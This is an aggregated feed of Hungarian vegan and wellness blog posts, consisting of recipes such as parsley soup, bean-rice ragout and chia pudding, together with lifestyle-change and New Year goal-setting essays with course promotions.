a fűszerességét, ha kell, pótoljuk, és adjuk hozzá a babot. Főzzük 5 percig, majd hagyjuk pár percig fedővel letakarva, ameddig a rizs meg nem puhul. Keverjük hozzá a petrezselymet, és tálaljuk! Megjegyzések: A fűszerek közül én ezt a kreol fűszerkeveréket és ezt a füstölt paprikát használtam. Nem reklám, tapasztalat. A rizs minősége tényleg fontos! Én jázmin rizsből szeretem a legjobban, de szinte bármilyen fajtából készíthetjük, nagyon finom lesz! Az étel elkészítésének van egy másik verziója is: ha külön készítjük el a zöldséges szószt, és külön főzzük meg a rizst. Akkor biztosan nem fő szét, és jobban tudjuk kontrollálni.
A sikeres életmódváltás 8 lépése
2019. január 1. Élj harmóniában
Sokan látják azt, hogy az életük nem jó irányba halad. Tapasztalják, hogy alacsonyabb az energiaszintjük, túlhajszoltak, sok a stressz az életükben, szoronganak, esetleg kialakult betegségeik vannak vagy éppen rossz az emésztésük, allergiáktól szenvednek, türelmetlenek, nem harmonikusak az emberi kapcsolataik, esetleg elhíztak, etc... hosszasan sorolhatnám még mi mindentől szenvednek az emberek manapság. Vannak olyan emberek aki nem ismerik fel a változás szükségességét, Ők azok, akik nem is tudnak jobb életet élni, marad a panaszkodás, a mások hibáztatása, a sajnálkozás, az irigység... Vannak olyan emberek, akik felismerik, hogy változtatniuk kell, mert ha ugyanazt csinálják, akkor ugyanazt az eredményt fogják kapni, de keveseknek sikerül igazán végig is vinni egy életmódváltást.. Most megmutatom neked, mi az a 8 lépés, ami garantálja a sikeres életmódváltást számodra:) 1. Hozd meg a döntést A legfontosabb része az életmódváltásnak, hogy komolyan határozd el mit szeretnél. Őszintén nézd meg hol tartasz és jelölj ki magadnak reális rövid és hosszú távú célokat. Ha úgy csinálsz valamit, hogy van egy bizonyos célod és annak tudatában csinálod a dolgokat, akkor elérheted a célt és megfelelő lesz az eredmény. Az jó ha fel is írod a céljaidat és rendszeresen gondold át a céljaid alakulását.. Ha valami nem sikerül ne keseredj el, maradj a célon, maradj kitartó. 2. Szerezz tudást, informálódj Ha tudod mit szeretnél elérni, szerezz tudást arról, hogyan érheted el az adott célt. Gyűjts információkat, beszélgess barátokkal, szakemberekkel, menj tanfolyamokra, keress hiteles információforrásokat könyvekben vagy az Interneten melyek segítenek közelebb kerülni a céljaidhoz. 2. Szabadulj meg a rossz szokásaidtól Az életmódváltás egyik legfontosabb része a rossz szokásainktól való megszabadulás. Vannak olyan rossz szokások, melyek károsan hatnak az egészségedre, közérzetedre, gyorsítják az öregedést vagy éppen nyugtalanabbá teszik az elmédet. Néhány dolog, amit érdemes elkerülni Dohányzás || Alkoholfogyasztás|| Helytelen táplálkozás || Kevés folyadékfogyasztás || Túlsúly || Késői fekvés, kevés pihenés || Kevés testmozgás || Stressz || Düh és haragtartás || Állandó rohanás Rossz szokásaidtól, úgy tudsz könnyen megszabadulni, ha helyette új, jó szokásokat alakítasz ki. néhány jó szokásról az alábbi linken olvashatsz https://eljharmoniaban.blogspot.com/2016/11/az-eletben-szokasaid-hatassal-vannak.html 3. Mozogj rendszeresen Az életmódváltás lényeges lépése a rendszeres testmozgás. Szakíts rá időt mindenképpen és építsd be a mozgást a hétköznapjaidba. Autó és busz helyett amennyit csak tudsz, sétálj, lift helyett mindig a lépcsőt válaszd, a munkahelyen amikor csak lehet e-mail és telefon helyett menj át a kollégához, ebédidőben sétálj egy kicsit, napközben többször állj fel a gép elől mozgasd át magad. Válassz heti 1-2 alkalommal olyan testmozgást, amely örömet okoz, illeszkedik a testalkatodhoz és a tested egészségesebb lesz tőle. (jóga, gerinctorna, thai chi, pilates, etc.) 4. Táplálkozz egészségesen Az életmódváltás legfontosabb része a táplálkozás, mert egészséged és közérzeted leginkább azon múlik mit, mikor, mennyit és hogyan eszel. Válaszd a minőségi ételeket. Táplálkozási alapelvek, melyeket célszerű figyelembe venni annak érdekében, hogy megőrizd az egészséged, fitt legyél és minden szükséges tápanyagot, vitamint, ásványi anyagot megkapjon a szervezted. - Használd az alapanyagok széles skáláját (gabonák, hüvelyesek, magvak, diófélék, tejtermékek, zöldségek, gyümölcsök) - Frissen szerezd be az alapanyagokat - zöldség, gyümölcs, tejtermék, - Használj teljes értékű élelmiszereket (teljes kiőrlésű lisztek, barna nádcukor) - Vásárlásnál a címkén mindig nézd meg mit tartalmaz - Fogyassz egyre több vegyszermentes, bio élelmiszert - Készíts frissen, változatos fogásokat - Annyit főzz, amennyi ételt megesztek - ha több van könnyebben eszel többet vagy ha újramelegíted és nem friss az étel nem jutsz belőle energiához - A vacsora könnyű étkezés legyen, ne tartalmazzon húst és tejtermékeket Vannak olyan rossz táplálkozási szokások, melyek elő bb utóbb komoly betegségekhez, elhízáshoz vezetnek. Kerüld el: - a félkész ételeket, éttermeket, gyors étkezdéket - a vegyszeres, adalékanyagokat tartalmazó élelmiszereket - előre csomagolt élelmiszereket, konzerveket, mireliteket - az egészségtelen ételeket, nassolnivalókat - a nehezen emészthető ételeket a túlzott só és cukorfogyasztást - túl hideg ételeket, italokat - este 10:00 utáni étkezést Táplálkozáshoz kapcsolódóan a komplett cikksorozatot itt olvashatod: https://eljharmoniaban.blogspot.com/2016/01/taplalkozz-egeszsegesen-1-tudatos.html 5. Szabadulj meg a feszültségektől A stressz nagyon komoly kihatással van az egész szervezetre. Fontos, hogy a felhalmozódott feszültségektől meg tudj szabadulni. Hosszútávon a gondolataid megváltoztatása, a személyiséged fejlesztése és az önismeret megszabadít a szorongástól, belső feszültségektől, konfliktusoktól. Rövidtávon masszázs, meditáció, relaxáció, jóga, séta a szabadban vagy bármilyen olyan tevékenység, együtt lenni a szeretteiddel ami pihentet és örömet okoz. Légy pozitív és mosolyogj sokat! A relaxációt ki is próbálhatod: https://eljharmoniaban.blogspot.com/2015/06/relaxacio-hatekony-stresszkezeles.html 6. Alakíts ki megfelelő napirendet, hagyj időt a pihenésre Ahogy a természetben is fontos az időzítés, úgy az ember életében is kiemelt szerepe van. Bizonyos időszakok egyes tevékenységek elvégzésére nagyon alkalmasak, más tevékenységek elvégzésére kevésbé alkalmasak. Amennyiben az életmódod kialakításnál figyelembe veszed a természete rendjét, azzal támogatod, hogy egyensúlyban legyél és az energiáidat a lehető legjobban használd fel. Amikor nem a természetes ritmusod szerint élsz teljesen kimeríted a szervezeted és kibillensz az egyensúlyodból. Néhány jó tanács egy ideális napirend kialakításához: - Legkésőbb 6-7 óráig kelj fel. - A reggeli tisztálkodás után szánj egy kis időt a napindításra - jóga, meditáció, valamilyen könnyed testmozgás, a nap végiggondolása, hála, etc.. - A reggelit 08:00- ig legkésőbb fogyaszd el - 8 után reggelizni, elég hízókúrás megoldás:) - Az ebédet 12:00-14:00 óra között fogyaszd el, ilyenkor a legerősebb az emésztés. - A vacsorát ha lehet 18:00 óráig fogyaszd el - Vacsora után már csak kellemes pihentető tevékenységeket csinálj - kerüld a filmezést, netezést, munkát. Ez segíti lenyughatni az elmét és a testet, felkészít egy jó az alvásra. - Lehetőleg 22:00-ig feküdj le aludni, de mindenképpen éjfél előtt bújj ágyba. 7. Légy kitartó és türelmes Ahhoz, hogy az új szokások bevezetésével eredményesek legyünk minimum 30-40 napra van szükségünk. Ha fenn tudjuk tartani az új dolgokat ennyi ideig akkor beépülnek a hétköznapjainkba. Lépésről lépésre haladj a változás útján. Fokozatosan építsd be az életmódodba az új dolgokat. Mindig legyenek előtted a céljaid, miért is csinálod (pl. fittebb, egészségesebb szeretnél lenni, boldogabb családi életre vágysz, ki akarsz gyógyulni egy betegségből, jó példát akarsz mutatni a gyerekeidnek, nyugodtabb szeretnél lenni, etc) és légy kitartó. Kezdetben csak egy-egy tanácsot próbálj megfogadni és figyeld meg a tapasztalásokat. A saját tapasztalásod a legfontosabb, ha jobban érzed magad, kellemesebb a közérzeted, több az energiád van már Önmagában tud inspirálni. Nem szabad hirtelen mindenről lemondani, itt is a fokozatosság a lényeg. Ha nagyon hirtelen mindent meg akarsz változtatni, akkor könnyen lehet, hogy az elméd nem bírja és besokall. Ha szépen lassan, fokozatosan építed be az új dolgokat az életedbe akkor az életed részévé válnak. 8. Leld örömödet Az emberek egy része a rohanó életforma mellett ritkán érzi magát igazán örömtelinek. A kiegyensúlyozott, boldog élethez elengedhetetlen az öröm, a vidámság tapasztalása. Találj olyan elfoglaltságokat ami neked örömet okozz, nevess, mosolyogj sokat légy olyanok társaságában akik feltöltenek, pozitívak, öröm a velük töltött idő. Kerüld az olyan dolgokat, helyzeteket, embereket, amik negatívvá, búskomorrá tesznek. Az életmódváltásnál is fontos, hogy élvezd. Az életmódváltás folyamata is okozzon örömet számodra:) . Ha néha valami nem a tervek szerint alakul ne legyen lelkiismeret furdalásod. Nem szabad merev szabályokhoz ragaszkodni, bízz a megérzéseidben. Ez a 8. lépés segít neked, hogy a 2019-ben sikeresen életmódot tudj váltani és ez az év, a legjobb éved legyen. Új dolgokba belekezdeni mindig nehéz, mert több erőfeszítést kíván meg, mint a régi szokásaid fenntartása. Mindig könnyebb egy megszokott utat járni. Amikor látod, hogy megszokott út nem vezet jó eredményre, akkor biztos lehetsz benne, hogy változtatnod kell, különben ugyanazt az eredményt kapod. Minden erőfeszítésed idővel meghozza a gyümölcsét. Mert nehezebbnek tűnhet elmenni minden héten a piacra vásárolni és minden nap frissen főzni, de ha cserébe energikusabb vagy, nincsenek emésztési problémáid, erősebb az immunrendszered és így elkerülnek a betegségek, nem kell orvoshoz, patikába járni, ideális a testsúlyod és kiegyensúlyozottabb leszel - ami javítja az emberi kapcsolataidat is - , akkor megéri a befektetett energia:) Sok kitartást kívánok az életmódváltáshoz Legyen 2019 a legjobb éved:) szertetettel: Kati
Így kezdj neki az Új évnek! - sikeres évindítás
2018. december 25. Élj harmóniában
Már csak egy kis idő választ el a 2019-es év kezdetétől. Talán nem is gondolnád, de az év legdepressziósabb hónapja a legtöbb ember életében a január. A karácsonyi ünneplések, izgalmak, családi együttlétek, ajándékok után, megjelennek a szürke, rideg, feladatokkal, konfliktusokkal teli hétköznapok. Esetleg a karácsonyi költések eredményeként, sokan szembesülnek vele, hogy bizony kiürült a családi kassza is. Ráadásul január elseje egy fordulópont is... átváltunk a 2019-es évre. A fordulópontokat általában az emberek nem viselik túl jól. Egy-egy fordulópont, az elmében automatikusan beindít egyfajta számvetési folyamatot.... kicsit eltűnődünk milyen is volt az eltelt időszak, mit értünk el, mit nem értünk el... nagyon sok embert megviselnek a kudarcai, az esetleges sikertelenség érzése. Ilyenkor hasznos ha megpróbálod tudatosan elengedni ami volt és tudatosan felkészülni a következő évre. Ahhoz, hogy a következő éved sikeres legyen az első lépés a tudatos tervezés. Önmagában a nagy fogadalmak, nem segítenek minket hozzá egy boldogabb, kiegyensúlyozottabb élethez. A siker titka, hogy belső világunkat rendezzük. Húzz egy vonalat képzeltedben és szemléld végig, milyen is volt az eltelt éved. Majd az előző év tapasztalataiból kiindulva, lehetőséged van arra, hogy átgondold mit szeretnél másképpen csinálni a következő évben. Ebben a bejegyzésben ehhez minden támogatást megpróbálok megadni Neked. A sikeres változtatáshoz, nagyon fontos, hogy komolyan határozd el pontosan miben szeretnél változtatni és légy tudatos arról, hogyan érheted el. Ne csak azt gondold, "majd rendszeresen mozgok" vagy "majd nem idegeskedem annyit " vagy "többet találkozom szeretteimmel" mert eltelik 2019 és újra azt fogod gondolni, na majd jövőre... A másik pont, amin sokan elbuknak, hogy egyszerre túl sok célt tűznek ki maguk elé. Ne akarj egy év alatt mindent teljesen megváltoztatni, nézd meg mely célok, változások reálisak az egy éves távlatra. Az elmúlt időszak átgondolásánál talán segít, ha szem előtt tartod, hogy bármi is történt Veled, az mindig érted van és a fejlődésedet szolgálja. Még akkor is ha az adott pillanatban úgy tűnik, hogy ez nem lesz a hasznodra és inkább érzed kényelmetlennek, kellemetlennek, mint jótékonynak. Néha az életünk leginkább rémes helyzeteinek, személyeinek köszönhetjük, hogy türelmet, alázatot, egyszerűséget, önzetlenséget, lemondást vagy éppen elengedést tanulhatunk. Sokszor ha visszatekintünk az életünkre rájövünk, milyen hálásak lehetünk egy-egy olyan életeseménynek, amit, akkor nagyon rossznak éltünk meg. Egy korábbi bejegyzésben erről olvashatsz: Sosem látod a teljes képet... Nem csak az év vége, hanem minden egyes napod új lehetőségeket, új tapasztalatokat hoz számodra. Járj mindig nyitott szemmel, figyeld mit hoz az élet, figyeld merre mennek a sínek. A nyitottság és az elfogadás, a rugalmasság fogja számodra biztosítani, hogy a következő éved igazán sikeres legyen... Mit jelent, hogy sikeres? Talán azt gondolod, hogy most a szokásos dolgokat fogom ideírni... jó állás van, jó fizetés, autó, elismerés, hírnév, tisztelet, valamiben jónak lenni, tehetség.... Sikeres az, aki boldog, elégedett önmagában, kiegyensúlyozott, egészséges, tökéletes harmóniában él önmagával és környezetével - a jóga a sikert az önmegvalósítás elérésével definiálja. Ha úgy érzed a mostani életed, a fentiek alapján nem annyira sikeres, akkor tegyél érte, hogy a következő évben, Te is boldog és kiegyensúlyozott legyél. Lásd a változás szükségességét, mert ha ugyanazt csinálod mint eddig, akkor sajnos ugyanazt az eredményt fogod kapni. A változás amit szeretnél érintheti az egészséged, életmódod, személyiséged fejlesztését, gondolkodásod változtatását, emberi kapcsolataidat vagy bármilyen olyan dolgot, amiben szeretnél más eredményt látni a következő évben. Gondold át a céljaidat és komolyan kötelezd el magad mellettük. Határozd meg mit szeretnél másképpen a jövőben és tudatosan gondold át, hogyan tudod elérni. Majd szeretettel, türelemmel lépésről, lépésre haladj a megvalósítás útján. Néhány hasznos gondolat ahhoz, hogy át tudd gondolni a 2018-as éved: - Hogyan jellemeznéd ezt az évet röviden? - Mik voltak az év legfontosabb eseményei? - Mik voltak az év legjobb pillanatai, minek örültél idén? - Mi okozott számodra bánatot, rossz érzéseket idén? - Mi jellemezte idén - a testi-lelki egészségedet, közérzetedet? - a párkapcsolatodat? - a családi kapcsolataidat? - a munkahelyi körülményeidet? - a baráti kapcsolataidat? - szabadidődet? - anyagi dolgaidat, pénzügyi helyzetedet? - Kik segítettek terveid alakulásában, kiknek vagy hálás? - Kikkel kötöttél barátságot? - Kikkel tudtál kibékülni, rendezni a kedvezőtlen kapcsolatokat? - Mit tanultál idén, miben sikerült fejlődnöd? - Milyen rossz tulajdonságoktól sikerült megszabadulnod? - Milyen változásokon mentél át amire büszke vagy? - Mit tennél másképpen? - Mi hiányzik az életedből? Í rd össze a dolgaidat, átgondoltan, tudatosan a 2019-as évre vonatkozóan is - ne rutinb ó l készíts listát , légy őszinte magadhoz, nézz a szíved mélyére valójában mire vágysz, mit szeretnél. Ha van egy cél amit kitűzöl, akkor képzeld el, milyen érzés lesz ha megvalósul. Ha ez nem jó érzésekkel tölt el, hanem negatív érzetek, szorongás, félelem társul hozzá, akkor jó ha újra átgondolod valóban ez egy célod-e vagy esetleg csak valamilyen elvárásnak, külső nyomásnak szeretnél megfelelni. N e ragaszkodj mindig a megszokott dolgokhoz. Légy nyitott p róbálj ki új dolgokat, tanulj új ismereteket, szerezz új tapasztalatokat. Egy kis segítség ahhoz, hogy a 2019-es éved sikeres legyen : - Mit szeretnél elérni, megvalósítani 2019-ben? - írd össze a céljaidat, terveid. - Miben szeretnél fejlődni, mit szeretnél tanulni? - Mik lesznek az év fontosabb eseményei? - Milyennek szeretnéd látni az alábbi életterületeket, miben szeretnél változtatni: - közérzet, egészség - táplálkozás - testmozgás - párkapcsolat - családi kapcsolatok - munkahelyi körülmények - baráti kapcsolatok - szabadidő eltöltése, hobbik, pihenés - anyagi dolgaid, pénzügyi helyzeted - Milyen rossz szokásodtól szeretnél megszabadulni? - Milyen negatív tulajdonságaidon szeretnél változtatni? - Milyen új dolgokat szeretnél kipróbálni idén? - Hová szeretnél eljutni, elutazni ebben az évben? Hasznos az is ha átlapozod a naptárad is és előre betervezed, a főbb eseményeket - családi rendezvények, munkahelyi programok, nyaralás, kisebb pihenések, utazások, kulturális rendezvények, iskolai események, etc). Ez majd ad egy keretet az évednek. Legyen meg az elképzelésed arról is , mit hogyan szeretnél, de tartsd szem előtt, lehet, hogy neked van egy terved, az uni verzumnak is van egy terve és a kettő nem mindig egyezik meg egymással. Engedd el a ragaszkodásaidat a jövődet illetően is... ez a világ a változásokról szól . Ha az események nem az elképzeléseid szerint alakulnak, ne akadj fenn, l égy rugalmas, mint a viharban azok a fák, amelyek nem törtnek össze, mert folyamatosan hajlonganak. L égy kész a változásra. Figyeld mindig merre mennek a sínek, és haladj az utadon, ne akarj minden áron egy akadálypályához görcsösen ragaszkodni. A világ nem f og megváltozni körülötted. Ne várd el a világtól, az emberektől, hogy megváltozzanak és minden úgy alakuljon ahogy Te szeretnéd. Bánj a dolgokkal, a személyekkel a természetük szerint. Minden helyzetben Te magad tudsz megváltozni, másképpen gondolkodni, másképpen hozzáállni a dolgokhoz. Higgy benne, hogy a dolgok mindig úgy alakulnak, ahogy azoknak alakulniuk kell . Ha megváltoztatod a gondolataidat, megváltozik az életed. Lásd a dolgok jó részét, légy rugalmas, pozitív, nyitott, türelmes és szeretetteljes. Tudj elégedett lenni, mosolyogj, szeress, adakozz, légy nagylelkű és kegyes és fejlődj sokat az új évben :) Sok szeretettel kívánok spirituális élményekben gazdag, harmonikus Új évet Kati
Meleg mogyorós ital (vegán)
Hideg téli napokon simogatja a testet és a lelket ez a finom, meleg ital, ami néhány hozzávalóból könnyen elkészíthető. Karácsonykor is meglepheted vele szeretteidet. Ha igazán sűrű italt szeretnél, akkor jobb, ha a növényi tejet te magad készíted el hozzá, Ha viszont nem akarsz azzal semmi időt tölteni, akkor egyszerűen csak végy egy doboz növényi tejet (amelyiket legjobban szereted). Szükséged lesz pár kanálnyi mogyorókrémre (ritkaság tudom, de ez esetben a legjobb a törökmogyoró krém, nem a világosbarna földimogyorókrém), pár csepp vanília esszencia és édesítéshez valami szirup, mint agavé vagy datolya, de ha csak por jellegű édesítőd van otthon, mint xylit vagy gyümölcscukor, az is jó lesz. Házilag készíthető növényi tejek közül ajánlom a zabtejet ami sokkal dúsabb, mint bármelyik bolti verzió. Ráadásul a mogyorókrém és a zabtej jól harmonizál egymással. Második verzióként esetleg a kókusztej házi elkészítését ajánlom.
A recept:
Hozzávalók:
- 1/2 liter növényi tej
- pár csepp vaníliakivonat
- édesítéshez agavé szirup
- 2-3 evőkanál törökmogyoró krém/vaj
Elkészítés:
Tudom, hogy ritkaságszámban lehet kapni boltokban törökmogyoró krémet/vajat, de mi is elkészíthetjük, ha egy bögrényi mogyorót a lehető legkrémesebbre aprítjuk, daráljuk. Ha nem tudnánk krémesre darálni, akkor sincs gond, mert a növényi tejjel rövid ideig felfőzve, majd átszürve a mogyoródaraboktól, meglesz a szükséges íz.
Tehát ha van otthon törökmogyoró krém vagy vaj, akkor a turmixgép poharába kanalazzuk, rácsepegtetjük a vaniliát és az agavé szirupot, majd felöntjük meleg növényi tejjel. Addig turmixoljuk, míg az egész szépen elegyedik. Ha nem nagyon erős a turmixgép, érdemes a növényi tejet előbb beletenni, aztán belekanalazni a mogyorókrémet.
Pohararkba töltjük és a tetejére mehet vegán tejszínhab vagy megszórhatjuk karobbal, vagy fahéjjal vagy kakaóval.
Karácsonyi kalács-muffin
Gasztroajándék vagy vendégváró falat, ünnepre készülő egyedi reggeli vagy hétvégi kényeztető falatok, mindegy is mi az indok hogy elkészítsük a kalács-muffinokat. Kelt tésztából, kakaósan és vaníliásan, megédesíthetjük velük a napjainkat. Különlegesen finom egy forró ital kíséretében.
A recept
Hozzávalók:
- 20 dkg teljes kiőrlésű liszt
- 30 dkg fehér liszt
- 8 dkg xylit/nyírfa cukor/gyümölcs cukor (ki mivel édesít)
- 7 dkg folyékony kókuszzsír
- 4-5 dl növényi tej
- fél kávéskanál só
- pár csepp vanília kivonat
- karob vagy kakaó
Elkészítés:
Fontos figyelnünk arra, hogy a konyhában, ahol készítjük a tészát, jó meleg legyen. Ne legyen huzat se.
Az élesztőt a kenyérsütő üstjébe morzsoljuk, és a 8 dkg édesítőszerből egy keveset beleteszünk, majd ráöntjük a felmelegített (kézmeleg) növényi tejet. Megvárjuk, míg az élesztő a tej felszínére kel vagy elegyedik. Ezután hozzáadjuk a többi tejet, cukrot, sót. Ezt követően a teljes kiőrlésű lisztet szórjuk bele, majd a kókuszzsírt, végül a fehér lisztet.
Dagasztó programot választunk. Kenyérsütő gép nélkül mi is összekeverhetjük - a tészta akkor jó, amikor a kézi dagasztás során már elválik az edény falától és hólyagos. Minél több hólyagok keletkeznek a tésztában, annál könnyebb lesz. Ha kézzel dolgozunk, akkor kilisztezett edénybe, konyharuhával letakarva meleg helyen kb. 1 órát pihentetjük, kelesztjük a tésztát. Mielőtt a konyharuhával letakarjuk, a tetejét is szórjuk meg egy kevés liszttel.
Amikor megdagadt, a tésztát két részre választjuk. Az egyikhez annyi karobot vagy kakaót keverünk, hogy szép barna színe legyen. Elképzelhető, hogy egy picit ezt a tésztát tovább kell édesíteni. Ez azon is múlik, ki mennyire édes szájú. Ha szükséges, még egy kis nyírfa cukrot keverhetünk hozzá.
A két különböző színű tésztából 1-1 evőkanállal lecsípünk és ezt tesszük a muffinformákba.Érdemes legalább kókuszzsírral jó alaposan kikenni a muffinformát és egy pici liszttel megszórni. Ha tehetjük és sütőpapírral ki tudjuk bélelni a formát, akkor nem szükséges kikenni. Én muffinpapírt tettem, de nem volt szerencsés megoldás, mert nehéz volt a papírt leszedni a muffinokról.
A muffinokat ismét letakarva meleg helyen kelesztjük fél órát. Nagyjából 25 perc alatt lassú tűzön készre sül.
Miután megsült, és már nem olyan meleg, rácsra tesszük. Ez is lehet vendégváró édesség, egy tea vagy valamilyen forró ital mellé.
Petrezselyemleves
Ajándékozz karácsonyra főzőtanfolyamot! Az akció részleteiért KATT IDE Ezt a receptet annak írtam, aki szereti a petrezselymet. Mily meglepő..! :))) Persze aki annyira nincs érte oda, az esetleg (részben) helyettesítheti bármilyen más zölddel, pl. spenóttal, de a bátrabbak próbálkozhatnak a zeller zöldjével is! A petrezselyem ugyanakkor fantasztikus növény, és méltánytalanul keveset eszünk belőle, ha csak mutatóban rakunk a tányérra a színéért. A zöldje ásványi anyagokban rekorder (kálium, vas), és kiemelkedően nagy mennyiségű C-, A-, és E- vitamint tartalmaz. Kiváló vízhajtó, és tele van finom illóolajokkal is. Ezek miatt szuper nyugtató, és jót tesz a magas vérnyomásnak, vizesedésnek. Csökkenti a szervezet allergiás reakciót is, ezért a petrezselyem segít nekünk még a szúnyogcsípéskor és a nyári tüsszögések idején is. Hozzávalók két személyre: - negyed vöröshagyma - negyed gerezd fokhagyma - 3 kis krumpli - fél mk mustár - fel mk kurkuma - késhegynyi pirospaprika - 1 mk só, bors, olaj - 1 nagy marék petrezselyemzöld - Egy evőkanál olívaolajon fonnyaszd meg először a vörös- majd fokhagymát. - Kanalazd rá a mustárt, és szórd bele a meghámozott, felkockázott krumplit. Most készítjük a leves alapot. - Öntsd fel 3 dl vízzel, és főzd meg a porított fűszerekkel. Hagyd kicsit kihűlni. - Utoljára turmixold bele a petrezselymet. Ezt már nem kell főzni, maradjon nyers. A krumplis levest öntsd be a botturmix poharába, dobd bele a megmosott zöldet, és turmixold krémesre. - Extra tipp: sült hagymával tálalva nagyon finom! :) Jó étvágyat! Elkészítési idő: 10 perc Ez egy vegán recept volt. :) Hasonló recepteket ITT találsz még. Ha itt feliratkozol, a legújabbakat mindig frissen kapod majd a postaládádba. :) Nézd meg a legújabb Kertkonyha főzőtanfolyamokat! Kezdő Vegán Vegán MUST HAVE - a kötelező alapcsomag Növényi Tejek és Tejtermékek I Növényi Tejtermékek II A Mindennapi Superfood Kezdő Vegán Angol nyelven Karácsonyi akció részleteiért KATT IDE The post Petrezselyemleves appeared first on Kertkonyha.
Sokfűszeres babos-rizses ragu
2018. november 24. Éltető ételek
Ez a ragu a gazdag ízek tökéletes kombinációja. Megdöbbentő, hogy néhány olyan egyszerű összetevőből, mint a bab, a rizs és a zöldségek, milyen hihetetlen ételt tudunk alkotni. Önmagában is tökéletes, de én készítettem hozzá alakor lisztből tortillát is. Hozzávalók (5-6 adag) - 1/2 kávéskanál chilipor - 1 késhegynyi cayenne-bors - 1/2 kávéskanál őrölt római kömény - 1/2 kávéskanál őrölt édeskömény - 1 kávéskanál füstölt, édes pirospaprika - 1 evőkanál kókuszolaj - 1 jó nagy vöröshagyma - 3-4 gerezd fokhagyma - 2 kaliforniai paprika - 1 csésze kukorica - 1 csésze vörös bab áztatva, majd megfőzve - 1 csésze parbolied rizs - 1 konzerv kockázott paradicsom (vagy 3 friss paradicsom kockázva) - 1 csésze paradicsomlé - 2 marék spenót - himalja só, bors - kevés víz Elkészítése: - A rizst 2 csésze vízzel és sóval mintegy 30 perc alatt főzd puhára. - Egy serpenyőben melegítsd fel a kókuszolajat, majd add hozzá az apró kockára vágott hagymát, fokhagymát és a kaliforniai paprikát. Kb. 5 perc alatt süsd puhára. Ízesítsd sóval, borssal. - Keverd hozzá a fűszereket, a kukoricát, a paradicsomokat, a főtt babot és a főtt rizst. Szórd bele a spenótot is. - 5-10 perc alatt főzd össze az ízeket. Extra: igazi téli ételt varázsolhatunk belőle, ha tepsibe teszed, sajtot szórsz rá, és összesütöd. Kínálj hozzá házi tortilla chipset.
Erdei gyümölcsös-joghurtos chia puding
Ha reggelire készíted, szuper reggelid lesz szuper hozzávalókkal. Ha desszertként tálalod, akkor pedig szuper édesség. Szuperlativuszokban beszélve elmondhatom, hogy szuper, ha chia pudingot fogyasztasz, mert a chia mag egészséges élelmiszer, gazdag ásványi anyagokban, mint a vas, foszfor, magnézium, réz és különösen a kalcium, Magas rosttartalménak köszönhetően lassítja a szervezetben a szénhidrátok lebontását és cukorrá alakítását, így megelőzi az étkezések utáni hirtelen vércukorszint-emelkedést. Ezáltal lelassítja és megelőzi a diabétesz okozta gyulladások kialakulását is.
A chia magban található rost igen nagy mennyiségű folyadékot képest megkötni, zselésedik, és a gyomorban térfogata megnő, ezáltal fogyasztója hosszabb ideig érzi magát jóllakottnak, így kevesebb kalóriát fogyaszt. A chia magban megtalálható fehérjék szintén segítenek az étel utáni sóvárgás leküzdésében és az evés mérséklésében, így az kiváló összetevője bármilyen diétás étrendnek.
A chia magról bebizonyították, hogy képes csökkenteni a vérben a trigliceridek és az LDL vagy rossz koleszterin szintjét, miközben növeli a HDL avagy jó koleszterinét. Segít kontroll alatt tartani a vérnyomást, csökkenti az inzulinrezisztenciát és az artériás gyulladásokat, hozzájárul a hasi elhízás csökkentéséhez, mindezek által védi a szív egészségét, megelőzi az agyvérzést és a szívrohamot. (forrás chia-mag.com)
A recept
Hozzávalók:
- 20 dkg erdei gyümölcs mix
- 250 ml növényi joghurt
- 3 ek chiamag
- Datolya vagy agave szirup vagy valamilyen egészségesebb cukorpótló
- Díszítéshez kókuszreszelék vagy kókuszcsipsz
Elkészítés:
Egy evőkanálnyi gyümölcsöt félre teszünk, a többit botmixerrel vagy turmixgéppel összedolgozzuk, hozzáadjuk a joghurtot. Amikor kész a gyümölcsös joghurt, hozzákeverünk kb. 2 ek szirupot (édes íz igénye szerint többet is lehet) és a chiamagot. Jól átkeverjük, majd hűtőbe tesszük, hogy megszívja magát nedvességgel.
Tálalás előtt kókuszcsipsszel és pár szem erdei gyümölccsel díszítjük.
Tepsis batáta – rostélyos beütéssel
Karácsonyi akció részleteiért KATT IDE
Évekkel ezelőtt volt valaki (én…) aki már sokat hallott az édesburgonyáról, de még sosem kóstolta.
Édes burgonya? Éééédes..? Minek az? :))) Ezért aztán nem is sürgettem azt a kóstolgatást olyan nagyon. Az sem segített, hogy hogy a neve a hétköznapi beszédben szinte használhatatlanul hosszú és nyakatekert, pfff!
Aztán eljött az első nagy kóstoló, ami egy kenyérre kenhető pástétom volt. Édeskés szendvics? Hát, sajnos az sem lett a kedvencem, köszönöm. :))
Eltelt pár év, és akkor jött velem szembe ez a recept, amiben – hát, igen – vállalhatatlanul sok a vörös- és fokhagyma! :D De pont ettől jó. Ezért bátorkodom, és szerintem teljesen helyén is való rostélyosnak hívni eme fantasztikumot. Én rendszeresen, már a tepsiből megeszem a magam tripla adagját.
A maradékhoz amúgy szuper vegán fasírtrecepteket találsz ITT és ITT. :)
Hozzávalók egy nagy tepsi batátához
- 2,5 kg batáta
- 4 fej vöröshagyma
- 5-6 gerezd fokhagyma
- 1 mk rozmaring
- só, bors
- olívaolaj
- Hámozd meg és vágd 2-3 centis darabokra a batátát. A vöröshagymát vágd négybe vagy nyolcba, a fokhagyma gerezdeket pedig felezd meg.
- Keverd el a zöldségeket egy jó nagy adag sóval, tekerj rá pár szórás borsot, hints rá a rozmaringot. Jól forgass mindent össze, és locsold meg finom olívaolajjal is.
- 200 fokos sütőben süsd, amíg a szélek meg nem pirulnak.
Jó étvágyat!
Elkészítési idő: 40 perc
Ez egy vegán recept volt. :)
Hasonló recepteket ITT találsz még.
Ha itt feliratkozol, a legújabbakat mindig frissen kapod majd a postaládádba. :)
Nézd meg a legújabb Kertkonyha főzőtanfolyamokat!
Kezdő Vegán
Vegán MUST HAVE - a kötelező alapcsomag Növényi Tejek és Tejtermékek I Növényi Tejtermékek II A Mindennapi Superfood
Kezdő Vegán Angol nyelven
Karácsonyi akció részleteiért KATT IDE
The post Tepsis batáta – rostélyos beütéssel appeared first on Kertkonyha.
Karalábés zöldborsó főzelék (vegán, gluténmentes)
